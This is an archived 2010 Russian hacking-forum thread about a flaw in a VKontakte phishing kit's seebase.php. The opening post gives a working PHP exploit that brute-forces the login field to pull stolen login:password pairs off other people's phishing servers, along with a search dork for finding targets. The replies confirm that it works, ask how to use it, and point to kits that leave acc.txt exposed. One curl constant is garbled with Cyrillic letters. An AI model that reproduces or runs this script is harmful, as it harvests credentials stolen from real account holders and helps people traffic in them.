Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Баг в фейке vkontakte

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> Баг в фейке vkontakte
Имя
Сообщение << Старые топики   Новые топики >>
Баг в фейке vkontakte - 2010-05-10 20:10:23.410000   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
В сети очень распростанен фейк для зомби - сети вконтакте, состоящий из файлов
-log.php
-base.php
-seebase.php

Баг кроется в файле seebase.php, позволяющий читать нам логи
if (strpos($buffer,$login) !== false) { echo $buffer.'&lt;BR&gt;'; break; } } fclose($fp); }
Все дело в том что нам не обязательно вводить логин, достаточно просто перебирать комбинации символов
: @ . _ 0 1 2 3 4 5 6 7 8 9 a b c d e f g h i k l m n o p q r s t v x y z
Те есть запись

misha_lox@mail.ru:qwerty

мы в поле логин вводим m и на выходе получаем misha_lox@mail.ru:qwerty
Стоит заметить что мы получим только одну запись(!) которая стоит первее всех в списке
Что бы не мучать мозг пишем сплоит

&lt;?php /* Exploit by FriLL [BugTrack Team] - http://bug-track.ru Vkontakte fake exploit Target - seebase.php Dork: inurl:seebase.php */ echo(" &lt;form method=\"post\"&gt; &lt;input type=\"text\" name=\"host\"&gt; &lt;input type=\"submit\"&gt; &lt;/form&gt; "); if(isset($_POST['host'])) { $arr = file("comb.txt"); $i=0; while($i&lt;count($arr)) { $postdata="login=".$arr[$i].""; $ch1 = curl_init("".$_POST['host']."/seebase.php"); curl_setopt ($ch1, CURLOPT_ENCODING, 0); curl_setopt ($ch1, CURLOPT_USERAGENT, 'Mozilla/5.0'); curl_setopt ($ch1, CURLOPT_POSTFIELDS, $postdata); curl_setopt ($ch1, CURLOPT_POST, 1); curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch1, CURLOPT_FAILonЕггор, 1); curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 30); $r=curl_exec ($ch1); if (curl_errno($ch1)) return false; else curl_close($ch1); $f = explode("&lt;BR&gt;", $r); if(isset($f[1])) { echo ("".$f[1]."&lt;br&gt;"); } $i++; } } ?&gt;
Post #: 1
RE: Баг в фейке vkontakte - 2010-05-10 20:34:37.546666   
MERRON

Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
Пойду поищу фэйки [sm=ab.gif]


Чтото результаты не выводяться…
Post #: 2
RE: Баг в фейке vkontakte - 2010-05-11 10:29:42.190000   
Pupkin-Zade

Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
Баг в фейке… Это новое слово в секурити! :D
Post #: 3
RE: Баг в фейке vkontakte - 2010-05-11 11:15:38.620000   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333

quote:

ORIGINAL: MERRON

Пойду поищу фэйки [sm=ab.gif]


Чтото результаты не выводяться…

На локалке работает хорошо
Post #: 4
RE: Баг в фейке vkontakte - 2010-06-01 01:51:57.903333   
kakawkin

Сообщений: 71
Оценки: 0
Присоединился: 2009-09-23 14:42:05.220000
ахахахах. автору + и за интересное наблюдение и за то что рассмешил названием темы
Post #: 5
RE: Баг в фейке vkontakte - 2010-06-01 03:13:04.776666   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
"kakawkin" - какой ник, такие и посты: имхо.
Post #: 6
RE: Баг в фейке vkontakte - 2010-06-17 23:08:18.643333   
xLordx

Сообщений: 608
Оценки: 0
Присоединился: 2010-05-04 17:59:11.626666
Баг действительно рабочий, спасибо)
Post #: 7
RE: Баг в фейке vkontakte - 2010-06-17 23:18:52.636666   
Webb

Сообщений: 90
Оценки: 0
Присоединился: 2008-06-28 09:00:53.736666
Полезненькая штука,ахахах,сейчас спамеры будут друг у друга акки тянуть с фэйков:D
Post #: 8
RE: Баг в фейке vkontakte - 2010-06-17 23:35:33.820000   
xLordx

Сообщений: 608
Оценки: 0
Присоединился: 2010-05-04 17:59:11.626666
Кстати от этого можно защитится, например напишите в base.php на первых строчках "А" "B" И никто нечего не увидет
Post #: 9
RE: Баг в фейке vkontakte - 2010-06-17 23:36:51.920000   
ladder

Сообщений: 7
Оценки: 0
Присоединился: 2010-06-09 20:00:29.076666
похоже это не на баг. а на грамотно оставленный бэкдор автором.
Post #: 10
RE: Баг в фейке vkontakte - 2010-06-18 10:35:56.556666   
coolziro

Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666
Не совсем понял как сплойт юзать… можно по подробней
Post #: 11
RE: Баг в фейке vkontakte - 2010-06-23 19:29:32.020000   
pcix97

Сообщений: 364
Оценки: 0
Присоединился: 2010-03-23 22:23:10.866666
Да а как эксплоит юзать? :D

За название 5+ :D
Post #: 12
RE: Баг в фейке vkontakte - 2010-06-30 13:29:37.683333   
Dark Master

Сообщений: 7
Оценки: 0
Присоединился: 2010-06-29 15:05:50.810000
баг уже был заметен давно) просто нераспростанялса…
кому надо, тот находил)
Post #: 13
RE: Баг в фейке vkontakte - 2010-07-03 20:26:35.243333   
Getty.

Сообщений: 165
Оценки: 0
Присоединился: 2010-07-01 23:30:47.416666
рвботает только на паблик фейках(
Post #: 14
RE: Баг в фейке vkontakte - 2010-07-09 16:02:05.073333   
xF1xeR

Сообщений: 52
Оценки: 0
Присоединился: 2010-07-07 23:33:32.330000
Благодарю за баг. Испробую.
Post #: 15
RE: Баг в фейке vkontakte - 2010-07-12 23:54:42.260000   
Tol.v

Сообщений: 23
Оценки: 0
Присоединился: 2008-12-19 20:42:03.330000
Тянем потянем) На тесте работает
Post #: 16
RE: Баг в фейке vkontakte - 2010-07-17 12:48:34.640000   
[Casper]

Сообщений: 501
Оценки: 0
Присоединился: 2010-06-29 11:55:29.333333
У ког есть фейк какого нибудь сайта, то он уж знает баги в фейках
Post #: 17
RE: Баг в фейке vkontakte - 2010-10-03 00:32:58.913333   
Fil8320

Сообщений: 22
Оценки: 0
Присоединился: 2010-10-03 00:07:27.333333
Полезная тема, как раз щас один фейк нашел.
Post #: 18
RE: Баг в фейке vkontakte - 2010-10-03 18:06:38.193333   
bioos

Сообщений: 66
Оценки: 0
Присоединился: 2010-08-25 23:29:03.506666
Полезненько..
Спасибо!
Post #: 19
RE: Баг в фейке vkontakte - 2010-10-15 02:40:38.250000   
.Law

Сообщений: 191
Оценки: 0
Присоединился: 2010-10-15 02:25:54.703333
Большинство фейков, уже переделали.
Так что добычи как раньше уже не будет.
Post #: 20
RE: Баг в фейке vkontakte - 2010-10-17 10:45:24.886666   
c1

Сообщений: 106
Оценки: 0
Присоединился: 2010-09-20 21:15:45.050000
спасибо)интересно)
Post #: 21
RE: Баг в фейке vkontakte - 2010-10-19 19:09:30.530000   
mawps

Сообщений: 220
Оценки: 0
Присоединился: 2010-03-18 19:42:31.080000
не актуально !
в новых фейках убрали это :(
Post #: 22
RE: Баг в фейке vkontakte - 2010-10-19 20:03:23.986666   
Паприка

Сообщений: 143
Оценки: 0
Присоединился: 2010-10-19 16:27:01.590000
Жалко… Была хорошая фишка.
Post #: 23
RE: Баг в фейке vkontakte - 2010-10-21 23:24:19.140000   
.Law

Сообщений: 191
Оценки: 0
Присоединился: 2010-10-15 02:25:54.703333
хорошая то хорошая.
но щас тоже есть мног фейков, где достаточно зайти в acc.txt и там будут акки)))
Post #: 24
Страниц:  [1]
Все форумы >> [Уязвимости] >> Баг в фейке vkontakte







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.